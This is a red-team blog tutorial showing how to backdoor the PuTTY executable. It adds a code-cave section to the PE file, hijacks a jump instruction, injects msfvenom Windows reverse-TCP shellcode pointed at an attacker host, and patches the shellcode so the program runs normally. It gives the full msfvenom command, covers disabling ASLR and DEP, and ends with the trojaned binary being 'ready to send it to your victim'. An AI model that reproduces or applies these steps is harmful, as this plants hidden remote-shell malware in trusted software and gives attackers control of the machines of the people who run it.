redteam ReverseEngineering

Backdooring PE file

by David

In this blog post i will show a technique to inject a shellcode backdoor inside a PE file.

Introduction

In this post i will inject a shellcode inside a PE file by adding a section header which will create a code cave inside the executable file. According to Wikipedia the code cave is:

A code cave is a series of null bytes in a process's memory. The code cave inside a process's memory is often a reference to a section of the code’s script functions that have capacity for the injection of custom instructions. For example, if a script’s memory allows for 5 bytes and only 3 bytes are used, then the remaining 2 bytes can be used to add additional code to the script without making significant changes.

ok. now after understanding a little bit of what code cave is, let’s move out to what we will actually do.

First we will create a code cave by inserting a new section header to our executable file and then we will hijack the execution flow of the program by redirecting the execution to our new section which will contain our shellcode, then after executing our shellcode inside our new section it will jump back to the normal execution flow of the program and continue to run succesfully.

It may doesn’t make scense to you but things will get easy to understand after doing it.

Prerequisits

Before you continue it’s very recommended to know about the following:

  • A little bit of Intel x86 Assembly
  • How to deal with a debugger
  • A bit of knowing about PE file structure

Preprations

We will need the following to start our process:

  • Windows 7 32bit recommended
  • Kali Linux recommended
  • PE-Bear PE Parser
  • x64dbg Debugger
  • Putty Executable to work on

Attention : while explaining this technique we will assume that there is no ASLR or DEP enabled to make the explaination of this technique more easier to understand.

To disable ASLR and DEP we will use EMET the enhanced mitigation experience toolkit.

00-emet

And then restart your machine.

Starting

Now let’s get going.

First we will generate our shellcode to inject it in the executable code cave that we will create it later.

Generate the shellcode with msfvenom by executing:

msfvenom --arch x86 --platform windows --payload windows/shell_reverse_tcp LHOST=192.168.1.9 LPORT=8000 -f hex

The output should be something similar to this:

01-kali

Make sure that you take a note to use it later.

1 Creating PE section header

Download and run putty.exe to make sure that it’s work proberly.

02-putty.png

Alright now we will create our new section header inside our PE executable file by using PE-Bear tool and going to Section Hdrs tab to see the PE sections.

03-sections

In order to create a new sction we will right click on Sections and select Add section.

04-addsection

Now write any section name you want, in my case i will call it .beef, then give a 1000 byte size (which is 4096 bytes but in hex) to Raw size and Virtual Size and mark on read, write, execute like this:

05-.beef

Our new section has been created and now save the new modified executable.

06-saveexecutable

and save it with a different name.

07-puttybeef

now try run the new modified executable to make sure that it’s still works.

08-stillworks

It should work with you as well.

2 Hijack exectution flow

Now open x64dbg debugger and throw our new modified executable inside it.

09-puttydebug

Go to Memory Map tab above to see our newly created section header.

10-beefsection

that’s a good sign, now copy the address of the new section which we will be using it to jump to our code cave.

11-beefaddr

We will paste it to our notes for now.

12-takenote1

Ok let us run our executable inside the debugger by pressing run button or by pressing F9 to go to the EntryPoint of the executable.

13-entrypoint

What we will do now is replacing an instruction code and replace it with another instruction that will make us jump to our code cave. In this case i will replace the jmp putty-beef.46FD35 by my instruction that will redirect the execution to the code cave and hijack the execution flow, but first i will take a copy of it because we will jump to it later.

14-jmpto

Lets take a note of it.

15-takenote2

I will fix the instruction being copied from x64dbg leaving the address only.

16-fixnote2

Now we can modifiy this jump instruction by replacing it with jmp <section addr>.

17-hijackexec

Now press F8 to execute the instruction and boom you are inside the code cave.

18-codecave

3 Inject shellcode backdoor code

Alright, the instruction code structure that we will inject right here should be as followed:

PUSHAD Save the registers
PUSHFD Save the falgs
shellcode backdoor code
Stack Alignment Restore the stack pervious value
POPFD Restore the flags
POPAD Restore the registers
Restore Execution Flow Restore stack frane and jump back

Ok lets start injecting our code instruction by injecting the first two instructions pushad and pushfd.

19-stackpush

Before continue lets look at ESP register value after executing the first two instructions.

20-esp1

I will take a note for it.

21-takenote3

Now copy our generated shellcode and paste it as binary inside the code cave.

22-injectcode

And now the shellcode is pasted inside the code cave section.

23-shellcode

4 Patching the shellcode

The shellcode and little bit of modifications to work well with the executable.

Patching WaitForSingleObject

Inside the shellcode there’s a function called WaitForSingleObject which is have parameter dwMilliseconds that will wait for FFFFFFFF == INFINITE time which will block the program thread until you exit from the shell, so the executable won’t run until you exit the shell.

We will try to look after an instruction sequance that will lead us to that parameter and changing its value, the instruction sequance is:

dec ESI
push ESI
inc ESI

24-seq

We will NOP the dec ESI instruction so that ESI stays will not get changed and it’s value will still at 0, which means that WaitForSingleObject function will wait 0 seconds so it will not block the program thread.

25-decesinop

Patching call ebp instruction

The call ebp might closing the executable process so we need to patch this instruction by simply NOP it.

26-callebpnop

Now let us set a breakpoint that NOP instruction.

27-breakpoint

And set a listener to receive the reverse shell connection.

28-setlistener

And run the executable inside the debugger until it hits the breakpoint by pressing F9

29-shell

Yes!, our shellcode has been executed succesfully.

Great, everything is done proberly.

5 Restore execution flow

Now lets restore the program execution flow in order to run the program itself proberly.

Stack alignment code

We need to restore the stack value like as it was before, lets take a look at the ESP value after executing

30-esp2

And take the note.

31-takenote4

So what we will do in order to resotre the stack value and do our stack alignment, we will subtract the old ESP value before executing shellcode and new ESP value after executing the shellcode.

32-esp1-esp2

In my case it equals 0x204 so we will resotre its pervious value by

add ESP, 0x204

33-rstackvalue

And restore the registers and flags values by

popfd
popad

34-stackpop

Then restore the execution flow by write the jmp address we copied earlier to contine execute the program normally

35-ourjmp

36-restexec

And press F9 to run.

37-itworked

The executable continue running succesfully and our shellcode as well.

6 Patch and Run

Lets patch our new infected executable by pressing the patch button above in the debugger.

38-patchexe

Click Patch File and Save with new name.

39-saveexe

And the executable is patched and backdoored succesfully!

40-patched

It should run outside the debugger as well, and it’s ready to send it to your victim.